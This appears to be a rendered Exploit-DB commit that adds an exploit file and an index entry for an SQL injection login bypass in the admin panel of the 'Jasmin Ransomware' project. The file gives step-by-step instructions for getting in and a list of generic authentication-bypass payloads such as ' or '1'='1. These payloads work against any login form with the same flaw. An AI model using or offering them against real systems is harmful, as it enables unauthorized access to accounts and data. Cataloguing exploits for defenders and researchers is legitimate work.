DB: 2025-03-22
2 changes to exploits/shellcodes/ghdb Jasmin Ransomware - SQL Injection Login Bypass
This commit is contained in:
parent
40ceb13974
commit
c185b4853b
2 changed files with 35 additions and 0 deletions
34
exploits/php/webapps/52091.txt
Normal file
34
exploits/php/webapps/52091.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Jasmin Ransomware SQL Injection Login Bypass
|
||||
# Google Dork: N/A
|
||||
# Date: 05-03-2025
|
||||
# Exploit Author: Buğra Enis Dönmez
|
||||
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
|
||||
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
|
||||
# Version: N/A
|
||||
# Tested on: Windows
|
||||
|
||||
How to exploit :
|
||||
|
||||
--> Open Admin Panel Through : http://localhost/login.php
|
||||
|
||||
--> Enter the SQL Injection Auth Bypass Payload to Email like : '=' 'or'
|
||||
|
||||
--> And to Access Code, Enter the same SQL Injection Authentication Bypass Payload : '=' 'or'
|
||||
|
||||
--> Press Authorize
|
||||
|
||||
--> Congratz, you're in
|
||||
|
||||
--> SQL Injection Authentication Bypass Payload : '=' 'or'
|
||||
|
||||
--> Payloads Can be use :
|
||||
|
||||
' or '1'='1
|
||||
|
||||
' or ''='
|
||||
|
||||
'=' 'or'
|
||||
|
||||
' OR '1'='1';-- -
|
||||
|
||||
' or 1 -- -
|
|
@ -20551,6 +20551,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
18069,exploits/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,webapps,php,,2011-11-03,2011-11-17,1,OSVDB-83346;OSVDB-83345;OSVDB-83330;CVE-2011-4095,,,,,
|
||||
18020,exploits/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,webapps,php,,2011-10-23,2011-10-23,0,OSVDB-76484;CVE-2011-4094,,,,,
|
||||
17895,exploits/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",webapps,php,,2011-09-27,2011-09-27,0,OSVDB-84557;OSVDB-84556;OSVDB-84555,,,,http://www.exploit-db.comjarida_1.0.tar.gz,
|
||||
52091,exploits/php/webapps/52091.txt,"Jasmin Ransomware - SQL Injection Login Bypass",2025-03-21,"Buğra Enis Dönmez",webapps,php,,2025-03-21,2025-03-21,0,,,,,,
|
||||
2505,exploits/php/webapps/2505.txt,"JASmine 0.0.2 - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php,,2006-10-09,,1,OSVDB-29668;CVE-2006-5318,,,,,
|
||||
4081,exploits/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection / Remote Code Execution",2007-06-19,Silentz,webapps,php,,2007-06-18,,1,OSVDB-37069;CVE-2007-3313;OSVDB-37068;CVE-2007-3312;OSVDB-37067,,,,,
|
||||
25193,exploits/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion",2005-03-07,"Filip Groszynski",webapps,php,,2005-03-07,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12747/info
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue